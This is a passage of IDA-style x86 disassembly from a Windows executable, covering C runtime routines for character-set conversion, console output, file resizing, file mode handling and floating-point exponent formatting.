		push	ebx
		mov	[ebp+var_30], eax
		mov	eax, [eax]
		push	esi
		mov	[ebp+var_24], eax
		mov	eax, [ebp+arg_0]
		push	edi
		xor	edi, edi
		cmp	eax, [ebp+arg_4]
		mov	[ebp+var_34], ecx
		mov	[ebp+var_20], edi
		mov	[ebp+var_2C], edi
		jz	loc_410845
		mov	esi, ds:dword_41D1B4
		lea	ecx, [ebp+var_18]
		push	ecx
		push	eax
		call	esi	; GetCPInfo
		test	eax, eax
		mov	ebx, ds:dword_41D0A0
		jz	short loc_41075B
		cmp	[ebp+var_18], 1
		jnz	short loc_41075B
		lea	eax, [ebp+var_18]
		push	eax
		push	[ebp+arg_4]
		call	esi	; GetCPInfo
		test	eax, eax
		jz	short loc_41075B
		cmp	[ebp+var_18], 1
		jnz	short loc_41075B
		mov	esi, [ebp+var_24]
		cmp	esi, 0FFFFFFFFh
		mov	[ebp+var_2C], 1
		jnz	short loc_410731
		push	[ebp+var_28]
		call	sub_4044E0
		mov	esi, eax
		pop	ecx
		inc	esi

loc_410731:				; CODE XREF: sub_4106A8+7Bj
		cmp	esi, edi

loc_410733:				; CODE XREF: sub_4106A8+C6j
		jle	short loc_410790
		cmp	esi, 7FFFFFF0h
		ja	short loc_410790
		lea	eax, [esi+esi+8]
		cmp	eax, 400h
		ja	short loc_410777
		call	sub_410860
		mov	eax, esp
		cmp	eax, edi
		jz	short loc_41078B
		mov	dword ptr [eax], 0CCCCh
		jmp	short loc_410788
; ---------------------------------------------------------------------------

loc_41075B:				; CODE XREF: sub_4106A8+53j
					; sub_4106A8+59j ...
		push	edi
		push	edi
		push	[ebp+var_24]
		push	[ebp+var_28]
		push	1
		push	[ebp+arg_0]
		call	ebx	; MultiByteToWideChar
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_410733

loc_410770:				; CODE XREF: sub_4106A8+EEj
		xor	eax, eax
		jmp	loc_410848
; ---------------------------------------------------------------------------

loc_410777:				; CODE XREF: sub_4106A8+9Ej
		push	eax
		call	sub_403AA0
		cmp	eax, edi
		pop	ecx
		jz	short loc_41078B
		mov	dword ptr [eax], 0DDDDh

loc_410788:				; CODE XREF: sub_4106A8+B1j
		add	eax, 8

loc_41078B:				; CODE XREF: sub_4106A8+A9j
					; sub_4106A8+D8j
		mov	[ebp+var_1C], eax
		jmp	short loc_410793
; ---------------------------------------------------------------------------

loc_410790:				; CODE XREF: sub_4106A8:loc_410733j
					; sub_4106A8+93j
		mov	[ebp+var_1C], edi

loc_410793:				; CODE XREF: sub_4106A8+E6j
		cmp	[ebp+var_1C], edi
		jz	short loc_410770
		lea	eax, [esi+esi]
		push	eax
		push	edi
		push	[ebp+var_1C]
		call	sub_407F20
		add	esp, 0Ch
		push	esi
		push	[ebp+var_1C]
		push	[ebp+var_24]
		push	[ebp+var_28]
		push	1
		push	[ebp+arg_0]
		call	ebx	; MultiByteToWideChar
		test	eax, eax
		jz	short loc_41083C
		mov	ebx, [ebp+var_34]
		cmp	ebx, edi
		jz	short loc_4107E1
		push	edi
		push	edi
		push	[ebp+arg_14]
		push	ebx
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ds:dword_41D134	; WideCharToMultiByte
		test	eax, eax
		jz	short loc_41083C
		mov	[ebp+var_20], ebx
		jmp	short loc_41083C
; ---------------------------------------------------------------------------

loc_4107E1:				; CODE XREF: sub_4106A8+11Aj
		cmp	[ebp+var_2C], edi
		mov	ebx, ds:dword_41D134
		jnz	short loc_410800
		push	edi
		push	edi
		push	edi
		push	edi
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ebx	; WideCharToMultiByte
		mov	esi, eax
		cmp	esi, edi
		jz	short loc_41083C

loc_410800:				; CODE XREF: sub_4106A8+142j
		push	esi
		push	1
		call	sub_407B2A
		cmp	eax, edi
		pop	ecx
		pop	ecx
		mov	[ebp+var_20], eax
		jz	short loc_41083C
		push	edi
		push	edi
		push	esi
		push	eax
		push	esi
		push	[ebp+var_1C]
		push	edi
		push	[ebp+arg_4]
		call	ebx	; WideCharToMultiByte
		cmp	eax, edi
		jnz	short loc_410831
		push	[ebp+var_20]
		call	sub_4039C3
		pop	ecx
		mov	[ebp+var_20], edi
		jmp	short loc_41083C
; ---------------------------------------------------------------------------

loc_410831:				; CODE XREF: sub_4106A8+179j
		cmp	[ebp+var_24], 0FFFFFFFFh
		jz	short loc_41083C
		mov	ecx, [ebp+var_30]
		mov	[ecx], eax

loc_41083C:				; CODE XREF: sub_4106A8+113j
					; sub_4106A8+132j ...
		push	[ebp+var_1C]
		call	sub_40C2EC
		pop	ecx

loc_410845:				; CODE XREF: sub_4106A8+38j
		mov	eax, [ebp+var_20]

loc_410848:				; CODE XREF: sub_4106A8+CAj
		lea	esp, [ebp-40h]
		pop	edi
		pop	esi
		pop	ebx
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		call	sub_402AD0
		leave
		retn
sub_4106A8	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_410860	proc near		; CODE XREF: sub_40C307+F3p
					; sub_40C307+1B1p ...

arg_0		= byte ptr  4

		push	ecx
		lea	ecx, [esp+4+arg_0]
		sub	ecx, eax
		and	ecx, 0Fh
		add	eax, ecx
		sbb	ecx, ecx
		or	eax, ecx
		pop	ecx
		jmp	sub_4117B0
sub_410860	endp

; ---------------------------------------------------------------------------
		push	ecx
		lea	ecx, [esp+8]
		sub	ecx, eax
		and	ecx, 7
		add	eax, ecx
		sbb	ecx, ecx
		or	eax, ecx
		pop	ecx
		jmp	sub_4117B0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41088C	proc near		; CODE XREF: sub_40D20A+2A1p
					; sub_40D20A+2C1p

var_10		= byte ptr -10h
var_C		= byte ptr -0Ch
var_4		= dword	ptr -4
arg_0		= word ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		xor	esi, esi
		cmp	dword_424218, esi
		jz	short loc_4108F5
		cmp	dword_424224, 0FFFFFFFEh
		jnz	short loc_4108B5
		call	sub_4117DB

loc_4108B5:				; CODE XREF: sub_41088C+22j
		mov	eax, dword_424224
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_4108C5

loc_4108BF:				; CODE XREF: sub_41088C+56j
					; sub_41088C+61j ...
		or	ax, 0FFFFh
		jmp	short loc_410935
; ---------------------------------------------------------------------------

loc_4108C5:				; CODE XREF: sub_41088C+31j
		push	esi
		lea	ecx, [ebp+var_10]
		push	ecx
		push	1
		lea	ecx, [ebp+arg_0]
		push	ecx
		push	eax
		call	ds:off_41D0A8
		test	eax, eax
		jnz	short loc_410942
		cmp	dword_424218, 2
		jnz	short loc_4108BF
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		cmp	eax, 78h
		jnz	short loc_4108BF
		mov	dword_424218, esi

loc_4108F5:				; CODE XREF: sub_41088C+19j
		push	esi
		push	esi
		push	5
		lea	eax, [ebp+var_C]
		push	eax
		push	1
		lea	eax, [ebp+arg_0]
		push	eax
		push	esi
		call	ds:off_41D0AC
		push	eax
		call	ds:dword_41D134	; WideCharToMultiByte
		mov	ecx, dword_424224
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_4108BF
		push	esi
		lea	edx, [ebp+var_10]
		push	edx
		push	eax
		lea	eax, [ebp+var_C]
		push	eax
		push	ecx
		call	ds:off_41D0B0
		test	eax, eax
		jz	short loc_4108BF

loc_410931:				; CODE XREF: sub_41088C+C0j
		mov	ax, [ebp+arg_0]

loc_410935:				; CODE XREF: sub_41088C+37j
		mov	ecx, [ebp+var_4]
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		leave
		retn
; ---------------------------------------------------------------------------

loc_410942:				; CODE XREF: sub_41088C+4Dj
		mov	dword_424218, 1
		jmp	short loc_410931
sub_41088C	endp

; ---------------------------------------------------------------------------
		push	2
		call	sub_407C0D
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410957	proc near		; CODE XREF: sub_40E422+36Fp

var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	1
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], ebx
		call	sub_40D06E
		mov	[ebp+var_18], eax
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_14], edx
		jz	short loc_4109DD
		push	2
		push	ebx
		push	ebx
		push	[ebp+arg_0]
		call	sub_40D06E
		mov	ecx, eax
		and	ecx, edx
		add	esp, 10h
		cmp	ecx, 0FFFFFFFFh
		jz	short loc_4109DD
		mov	esi, [ebp+arg_4]
		mov	edi, [ebp+arg_8]
		sub	esi, eax
		sbb	edi, edx
		js	loc_410A72
		jg	short loc_4109B6
		cmp	esi, ebx
		jbe	loc_410A72

loc_4109B6:				; CODE XREF: sub_410957+55j
		mov	ebx, 1000h
		push	ebx
		push	8
		call	ds:dword_41D0FC	; GetProcessHeap
		push	eax
		call	ds:dword_41D110	; RtlAllocateHeap
		test	eax, eax
		mov	[ebp+var_4], eax
		jnz	short loc_4109E9
		call	sub_405B83
		mov	dword ptr [eax], 0Ch

loc_4109DD:				; CODE XREF: sub_410957+2Bj
					; sub_410957+43j ...
		call	sub_405B83
		mov	eax, [eax]

loc_4109E4:				; CODE XREF: sub_410957+1AFj
		pop	edi
		pop	esi
		pop	ebx
		leave
		retn
; ---------------------------------------------------------------------------

loc_4109E9:				; CODE XREF: sub_410957+79j
		push	8000h
		push	[ebp+arg_0]
		call	sub_410B7D
		pop	ecx
		pop	ecx
		mov	[ebp+var_8], eax

loc_4109FB:				; CODE XREF: sub_410957+CFj
					; sub_410957+D3j
		test	edi, edi
		jl	short loc_410A09
		jg	short loc_410A05
		cmp	esi, ebx
		jb	short loc_410A09

loc_410A05:				; CODE XREF: sub_410957+A8j
		mov	eax, ebx
		jmp	short loc_410A0B
; ---------------------------------------------------------------------------

loc_410A09:				; CODE XREF: sub_410957+A6j
					; sub_410957+ACj
		mov	eax, esi

loc_410A0B:				; CODE XREF: sub_410957+B0j
		push	eax
		push	[ebp+var_4]
		push	[ebp+arg_0]
		call	sub_40D20A
		add	esp, 0Ch
		cmp	eax, 0FFFFFFFFh
		jz	short loc_410A55
		cdq
		sub	esi, eax
		sbb	edi, edx
		js	short loc_410A2C
		jg	short loc_4109FB
		test	esi, esi
		ja	short loc_4109FB

loc_410A2C:				; CODE XREF: sub_410957+CDj
		mov	esi, [ebp+var_10]

loc_410A2F:				; CODE XREF: sub_410957+119j
		push	[ebp+var_8]
		push	[ebp+arg_0]
		call	sub_410B7D
		pop	ecx
		pop	ecx
		push	[ebp+var_4]
		push	0
		call	ds:dword_41D0FC	; GetProcessHeap
		push	eax
		call	ds:dword_41D108	; RtlFreeHeap
		xor	ebx, ebx
		jmp	loc_410ADB
; ---------------------------------------------------------------------------

loc_410A55:				; CODE XREF: sub_410957+C6j
		call	sub_405B96
		cmp	dword ptr [eax], 5
		jnz	short loc_410A6A
		call	sub_405B83
		mov	dword ptr [eax], 0Dh

loc_410A6A:				; CODE XREF: sub_410957+106j
		or	esi, 0FFFFFFFFh
		mov	[ebp+var_C], esi
		jmp	short loc_410A2F
; ---------------------------------------------------------------------------

loc_410A72:				; CODE XREF: sub_410957+4Fj
					; sub_410957+59j
		cmp	edi, ebx
		jg	short loc_410AE7
		jl	short loc_410A7C
		cmp	esi, ebx
		jnb	short loc_410AE7

loc_410A7C:				; CODE XREF: sub_410957+11Fj
		push	ebx
		push	[ebp+arg_8]
		push	[ebp+arg_4]
		push	[ebp+arg_0]
		call	sub_40D06E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_4109DD
		push	[ebp+arg_0]
		call	sub_40F12D
		pop	ecx
		push	eax
		call	ds:off_41D0A4
		neg	eax
		sbb	eax, eax
		neg	eax
		dec	eax
		cdq
		mov	[ebp+var_10], eax
		and	eax, edx
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_C], edx
		jnz	short loc_410AE7
		call	sub_405B83
		mov	dword ptr [eax], 0Dh
		call	sub_405B96
		mov	esi, eax
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		mov	[esi], eax
		mov	esi, [ebp+var_10]

loc_410ADB:				; CODE XREF: sub_410957+F9j
		and	esi, [ebp+var_C]
		cmp	esi, 0FFFFFFFFh
		jz	loc_4109DD

loc_410AE7:				; CODE XREF: sub_410957+11Dj
					; sub_410957+123j ...
		push	ebx
		push	[ebp+var_14]
		push	[ebp+var_18]
		push	[ebp+arg_0]
		call	sub_40D06E
		and	eax, edx
		add	esp, 10h
		cmp	eax, 0FFFFFFFFh
		jz	loc_4109DD
		xor	eax, eax
		jmp	loc_4109E4
sub_410957	endp


; =============== S U B	R O U T	I N E =======================================



sub_410B0B	proc near		; CODE XREF: sub_40E422+322p
					; sub_40E422+37Fp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	esi
		mov	esi, [esp+4+arg_0]
		push	esi
		call	sub_40F12D
		cmp	eax, 0FFFFFFFFh
		pop	ecx
		jnz	short loc_410B2C
		call	sub_405B83
		mov	dword ptr [eax], 9
		or	eax, 0FFFFFFFFh
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_410B2C:				; CODE XREF: sub_410B0B+Fj
		push	edi
		push	[esp+8+arg_8]
		push	0
		push	[esp+10h+arg_4]
		push	eax
		call	ds:off_41D074
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_410B4D
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		jmp	short loc_410B4F
; ---------------------------------------------------------------------------

loc_410B4D:				; CODE XREF: sub_410B0B+38j
		xor	eax, eax

loc_410B4F:				; CODE XREF: sub_410B0B+40j
		test	eax, eax
		jz	short loc_410B5F
		push	eax
		call	sub_405BA9
		pop	ecx
		or	eax, 0FFFFFFFFh
		jmp	short loc_410B7A
; ---------------------------------------------------------------------------

loc_410B5F:				; CODE XREF: sub_410B0B+46j
		mov	eax, esi
		and	esi, 1Fh
		imul	esi, 28h
		sar	eax, 5
		mov	eax, dword_435300[eax*4]
		lea	eax, [eax+esi+4]
		and	byte ptr [eax],	0FDh
		mov	eax, edi

loc_410B7A:				; CODE XREF: sub_410B0B+52j
		pop	edi
		pop	esi
		retn
sub_410B0B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410B7D	proc near		; CODE XREF: sub_410957+9Ap
					; sub_410957+DEp

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		mov	edx, [ebp+arg_0]
		mov	eax, edx
		sar	eax, 5
		and	edx, 1Fh
		imul	edx, 28h
		push	ebx
		mov	ebx, [ebp+arg_4]
		push	esi
		lea	esi, ds:435300h[eax*4]
		mov	eax, [esi]
		lea	ecx, [eax+edx]
		movzx	eax, byte ptr [ecx+4]
		and	eax, 80h
		mov	[ebp+arg_0], eax
		mov	al, [ecx+24h]
		add	al, al
		movsx	eax, al
		push	edi
		mov	edi, 4000h
		sar	eax, 1
		cmp	ebx, edi
		jz	short loc_410C0F
		cmp	ebx, 8000h
		jz	short loc_410C09
		cmp	ebx, 10000h
		jz	short loc_410BF5
		cmp	ebx, 20000h
		jz	short loc_410BF5
		cmp	ebx, 40000h
		jnz	short loc_410C1C
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		mov	dl, [ecx]
		and	dl, 81h
		or	dl, 1

loc_410BF1:				; CODE XREF: sub_410B7D+8Aj
		mov	[ecx], dl
		jmp	short loc_410C1C
; ---------------------------------------------------------------------------

loc_410BF5:				; CODE XREF: sub_410B7D+50j
					; sub_410B7D+58j
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		mov	dl, [ecx]
		and	dl, 82h
		or	dl, 2
		jmp	short loc_410BF1
; ---------------------------------------------------------------------------

loc_410C09:				; CODE XREF: sub_410B7D+48j
		and	byte ptr [ecx+4], 7Fh
		jmp	short loc_410C1C
; ---------------------------------------------------------------------------

loc_410C0F:				; CODE XREF: sub_410B7D+40j
		or	byte ptr [ecx+4], 80h
		mov	ecx, [esi]
		lea	ecx, [ecx+edx+24h]
		and	byte ptr [ecx],	80h

loc_410C1C:				; CODE XREF: sub_410B7D+60j
					; sub_410B7D+76j ...
		cmp	[ebp+arg_0], 0
		jnz	short loc_410C29
		mov	eax, 8000h
		jmp	short loc_410C34
; ---------------------------------------------------------------------------

loc_410C29:				; CODE XREF: sub_410B7D+A3j
		neg	eax
		sbb	eax, eax
		and	eax, 0C000h
		add	eax, edi

loc_410C34:				; CODE XREF: sub_410B7D+AAj
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_410B7D	endp


; =============== S U B	R O U T	I N E =======================================



sub_410C39	proc near		; CODE XREF: sub_40E422+40p

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		push	esi
		xor	esi, esi
		cmp	eax, esi
		jnz	short loc_410C61
		call	sub_405B83
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		push	16h
		pop	eax
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_410C61:				; CODE XREF: sub_410C39+9j
		mov	ecx, dword_427BA0
		mov	[eax], ecx
		xor	eax, eax
		pop	esi
		retn
sub_410C39	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410C6D	proc near		; CODE XREF: sub_410DE8+6p
					; DATA XREF: sub_40FABC+55o ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	esi, [ebp+arg_0]
		movsx	eax, byte ptr [esi]
		push	eax
		call	sub_405B21
		cmp	eax, 65h
		jmp	short loc_410C9C
; ---------------------------------------------------------------------------

loc_410C90:				; CODE XREF: sub_410C6D+30j
		inc	esi
		movzx	eax, byte ptr [esi]
		push	eax
		call	sub_40F52F
		test	eax, eax

loc_410C9C:				; CODE XREF: sub_410C6D+21j
		pop	ecx
		jnz	short loc_410C90
		movsx	eax, byte ptr [esi]
		push	eax
		call	sub_405B21
		cmp	eax, 78h
		pop	ecx
		jnz	short loc_410CB0
		inc	esi
		inc	esi

loc_410CB0:				; CODE XREF: sub_410C6D+3Fj
		mov	ecx, [ebp+var_10]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		mov	al, [esi]
		mov	cl, [ecx]
		mov	[esi], cl
		inc	esi

loc_410CC2:				; CODE XREF: sub_410C6D+60j
		mov	cl, [esi]
		mov	[esi], al
		mov	al, cl
		mov	cl, [esi]
		inc	esi
		test	cl, cl
		jnz	short loc_410CC2
		cmp	[ebp+var_4], cl
		pop	esi
		jz	short locret_410CDC
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

locret_410CDC:				; CODE XREF: sub_410C6D+66j
		leave
		retn
sub_410C6D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410CDE	proc near		; CODE XREF: sub_410DF6+6p
					; DATA XREF: sub_40FABC+4Bo ...

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	esi
		push	[ebp+arg_4]
		lea	ecx, [ebp+var_10]
		call	sub_402ADF
		mov	eax, [ebp+arg_0]
		mov	cl, [eax]
		test	cl, cl
		mov	esi, [ebp+var_10]
		jz	short loc_410D11
		mov	edx, [esi+0BCh]
		mov	edx, [edx]
		mov	dl, [edx]

loc_410D06:				; CODE XREF: sub_410CDE+31j
		cmp	cl, dl
		jz	short loc_410D11
		inc	eax
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_410D06

loc_410D11:				; CODE XREF: sub_410CDE+1Cj
					; sub_410CDE+2Aj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jz	short loc_410D4E
		jmp	short loc_410D25
; ---------------------------------------------------------------------------

loc_410D1A:				; CODE XREF: sub_410CDE+4Bj
		cmp	cl, 65h
		jz	short loc_410D2B
		cmp	cl, 45h
		jz	short loc_410D2B
		inc	eax

loc_410D25:				; CODE XREF: sub_410CDE+3Aj
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_410D1A

loc_410D2B:				; CODE XREF: sub_410CDE+3Fj
					; sub_410CDE+44j
		mov	edx, eax

loc_410D2D:				; CODE XREF: sub_410CDE+53j
		dec	eax
		cmp	byte ptr [eax],	30h
		jz	short loc_410D2D
		mov	ecx, [esi+0BCh]
		mov	ecx, [ecx]
		push	ebx
		mov	bl, [eax]
		cmp	bl, [ecx]
		pop	ebx
		jnz	short loc_410D44
		dec	eax

loc_410D44:				; CODE XREF: sub_410CDE+63j
					; sub_410CDE+6Ej
		mov	cl, [edx]
		inc	eax
		inc	edx
		test	cl, cl
		mov	[eax], cl
		jnz	short loc_410D44

loc_410D4E:				; CODE XREF: sub_410CDE+38j
		cmp	[ebp+var_4], 0
		pop	esi
		jz	short locret_410D5C
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

locret_410D5C:				; CODE XREF: sub_410CDE+75j
		leave
		retn
sub_410CDE	endp

; ---------------------------------------------------------------------------
word_410D5E	dw 0EED9h		; DATA XREF: sub_40FABC+28o
					; .data:off_423F90o
		dd 424448Bh, 0E0DF18DCh, 7A41C4F6h, 40C03304h, 0C3C033C3h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410D74	proc near		; CODE XREF: sub_410DB4+Ep
					; DATA XREF: sub_40FABC+41o ...

var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		cmp	[ebp+arg_0], 0
		push	[ebp+arg_C]
		push	[ebp+arg_8]
		jz	short loc_410D9E
		lea	eax, [ebp+var_8]
		push	eax
		call	sub_41185D
		mov	ecx, [ebp+var_8]
		mov	eax, [ebp+arg_4]
		mov	[eax], ecx
		mov	ecx, [ebp+var_4]
		mov	[eax+4], ecx
		jmp	short loc_410DAF
; ---------------------------------------------------------------------------

loc_410D9E:				; CODE XREF: sub_410D74+Fj
		lea	eax, [ebp+arg_0]
		push	eax
		call	sub_411903
		mov	eax, [ebp+arg_4]
		mov	ecx, [ebp+arg_0]
		mov	[eax], ecx

loc_410DAF:				; CODE XREF: sub_410D74+28j
		add	esp, 0Ch
		leave
		retn
sub_410D74	endp


; =============== S U B	R O U T	I N E =======================================



sub_410DB4	proc near		; DATA XREF: sub_40FABC+14o
					; .data:off_423F88o

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch

		push	0
		push	[esp+4+arg_8]
		push	[esp+8+arg_4]
		push	[esp+0Ch+arg_0]
		call	sub_410D74
		add	esp, 10h
		retn
sub_410DB4	endp


; =============== S U B	R O U T	I N E =======================================



sub_410DCB	proc near		; CODE XREF: sub_410E04+88p
					; sub_4113CE+8Ap ...
		test	edi, edi
		push	esi
		mov	esi, eax
		jz	short loc_410DE6
		push	esi
		call	sub_4044E0
		inc	eax
		push	eax
		push	esi
		add	esi, edi
		push	esi
		call	sub_407720
		add	esp, 10h

loc_410DE6:				; CODE XREF: sub_410DCB+5j
		pop	esi
		retn
sub_410DCB	endp


; =============== S U B	R O U T	I N E =======================================



sub_410DE8	proc near		; DATA XREF: sub_40FABC+1Eo
					; .data:off_423F8Co

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_410C6D
		pop	ecx
		pop	ecx
		retn
sub_410DE8	endp


; =============== S U B	R O U T	I N E =======================================



sub_410DF6	proc near		; DATA XREF: sub_40FABC+Ao
					; .data:off_423F84o

arg_0		= dword	ptr  4

		push	0
		push	[esp+4+arg_0]
		call	sub_410CDE
		pop	ecx
		pop	ecx
		retn
sub_410DF6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_410E04	proc near		; CODE XREF: sub_410F71+B7p
					; sub_41157C+E1p

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= byte ptr  18h
arg_14		= dword	ptr  1Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 10h
		push	ebx
		push	esi
		push	edi
		push	[ebp+arg_14]
		lea	ecx, [ebp+var_10]
		mov	ebx, eax
		call	sub_402ADF
		xor	esi, esi
		cmp	ebx, esi
		jnz	short loc_410E4B

loc_410E20:				; CODE XREF: sub_410E04+4Aj
		call	sub_405B83
		push	16h

loc_410E27:				; CODE XREF: sub_410E04+67j
		pop	edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	[eax], edi
		call	sub_4032F9
		add	esp, 14h
		cmp	[ebp+var_4], 0
		jz	short loc_410E44
		mov	eax, [ebp+var_8]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_410E44:				; CODE XREF: sub_410E04+37j
		mov	eax, edi
		jmp	loc_410F6C
; ---------------------------------------------------------------------------

loc_410E4B:				; CODE XREF: sub_410E04+1Aj
		cmp	[ebp+arg_0], esi
		jbe	short loc_410E20
		cmp	[ebp+arg_4], esi
		jle	short loc_410E5A
		mov	eax, [ebp+arg_4]
		jmp	short loc_410E5C
; ---------------------------------------------------------------------------

loc_410E5A:				; CODE XREF: sub_410E04+4Fj
		xor	eax, eax

loc_410E5C:				; CODE XREF: sub_410E04+54j
		add	eax, 9
		cmp	[ebp+arg_0], eax
		ja	short loc_410E6D
		call	sub_405B83
		push	22h
		jmp	short loc_410E27
; ---------------------------------------------------------------------------

loc_410E6D:				; CODE XREF: sub_410E04+5Ej
		cmp	[ebp+arg_10], 0
		jz	short loc_410E91
		mov	edx, [ebp+arg_C]
		xor	eax, eax
		cmp	[ebp+arg_4], esi
		setnle	al
		xor	ecx, ecx
		cmp	dword ptr [edx], 2Dh
		setz	cl
		mov	edi, eax
		add	ecx, ebx
		mov	eax, ecx
		call	sub_410DCB

loc_410E91:				; CODE XREF: sub_410E04+6Dj
		mov	edi, [ebp+arg_C]
		cmp	dword ptr [edi], 2Dh
		mov	esi, ebx
		jnz	short loc_410EA1
		mov	byte ptr [ebx],	2Dh
		lea	esi, [ebx+1]

loc_410EA1:				; CODE XREF: sub_410E04+95j
		cmp	[ebp+arg_4], 0
		jle	short loc_410EBF
		lea	eax, [esi+1]
		mov	cl, [eax]
		mov	[esi], cl
		mov	esi, eax
		mov	eax, [ebp+var_10]
		mov	eax, [eax+0BCh]
		mov	eax, [eax]
		mov	al, [eax]
		mov	[esi], al

loc_410EBF:				; CODE XREF: sub_410E04+A1j
		xor	eax, eax
		cmp	[ebp+arg_10], al
		setz	al
		add	eax, [ebp+arg_4]
		add	esi, eax
		cmp	[ebp+arg_0], 0FFFFFFFFh
		jnz	short loc_410ED7
		or	ebx, 0FFFFFFFFh
		jmp	short loc_410EDC
; ---------------------------------------------------------------------------

loc_410ED7:				; CODE XREF: sub_410E04+CCj
		sub	ebx, esi
		add	ebx, [ebp+arg_0]

loc_410EDC:				; CODE XREF: sub_410E04+D1j
		push	offset aE000	; "e+000"
		push	ebx
		push	esi
		call	sub_407A85
		add	esp, 0Ch
		xor	ebx, ebx
		test	eax, eax
		jz	short loc_410EFE
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4031FD
		add	esp, 14h

loc_410EFE:				; CODE XREF: sub_410E04+EBj
		cmp	[ebp+arg_8], ebx
		lea	ecx, [esi+2]
		jz	short loc_410F09
		mov	byte ptr [esi],	45h

loc_410F09:				; CODE XREF: sub_410E04+100j
		mov	eax, [edi+0Ch]
		inc	esi
		cmp	byte ptr [eax],	30h
		jz	short loc_410F40
		mov	eax, [edi+4]
		dec	eax
		jns	short loc_410F1D
		neg	eax
		mov	byte ptr [esi],	2Dh

loc_410F1D:				; CODE XREF: sub_410E04+112j
		inc	esi
		cmp	eax, 64h
		jl	short loc_410F2D
		cdq
		push	64h
		pop	edi
		idiv	edi
		add	[esi], al
		mov	eax, edx

loc_410F2D:				; CODE XREF: sub_410E04+11Dj
		inc	esi
		cmp	eax, 0Ah
		jl	short loc_410F3D
		cdq
		push	0Ah
		pop	edi
		idiv	edi
		add	[esi], al
		mov	eax, edx

loc_410F3D:				; CODE XREF: sub_410E04+12Dj
		add	[esi+1], al

loc_410F40:				; CODE XREF: sub_410E04+10Cj
		test	byte_427BA4, 1
		jz	short loc_410F5D
		cmp	byte ptr [ecx],	30h
		jnz	short loc_410F5D
		push	3
		lea	eax, [ecx+1]
		push	eax
		push	ecx
		call	sub_407720
